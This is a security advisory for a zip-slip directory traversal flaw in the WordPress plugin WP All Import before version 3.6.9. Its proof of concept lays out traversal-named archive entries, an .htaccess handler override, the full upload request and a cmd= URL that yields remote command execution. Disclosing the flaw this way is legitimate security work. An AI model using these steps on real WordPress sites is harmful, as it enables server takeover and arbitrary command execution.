WP All Import < 3.6.9 - Admin+ Directory traversal via file upload

The plugin is not validating the paths of files contained in uploaded zip archives, allowing highly privileged users, such as admins, to write arbitrary files to any part of the file system accessible by the web server via a path traversal vector.

PoC

[1] Download ‘poc.zip’ via ‘https://github.com/lucy-official/TIL/raw/main/Security/Test Files/Zipslip/poc.zip’ poc.zip contains 2 files like below -> ‘…/…/…/…/…/…/…/…/…/…/var/www/html/exploit.php.txt’ -> ‘…/…/…/…/…/…/…/…/var/www/html/.htaccess’ [1-1] ‘…/…/…/…/…/…/…/…/…/…/var/www/html/exploit.php.txt’ is as follows. ---------------------------------- ---------------------------------- [1-2] ‘…/…/…/…/…/…/…/…/var/www/html/.htaccess’ is as follows. ---------------------------------- [same as the existing .htaccess data] AddHandler application/x-httpd-php .php .html ---------------------------------- [2] Upload the ‘poc.zip’ via the button [Upload a file] on ‘http://localhost/wp-admin/admin.php?page=pmxi-admin-import’ [3] Access ‘http://localhost/exploit.php.txt?cmd=id’ in order to execute arbitrary commands. [+++] PoC Request Packet Sample POST /wp-admin/admin.php?page=pmxi-admin-settings&action;=upload&_wpnonce=afb6fb6e5c HTTP/1.1 Host: localhost Content-Length: 1333 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu Accept: / Origin: http://localhost Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [wordpress-admin-cookie] Connection: close ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name=“name” poc.zip ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name=“chunk” 0 ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name=“chunks” 1 ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name=“async-upload”; filename=“poc.zip” Content-Type: application/zip [poc.zip payload] [ - you can download it via ‘https://github.com/lucy-official/TIL/raw/main/Security/Test Files/Zipslip/poc.zip’] ------WebKitFormBoundaryrhApgY7BhUu88AGu–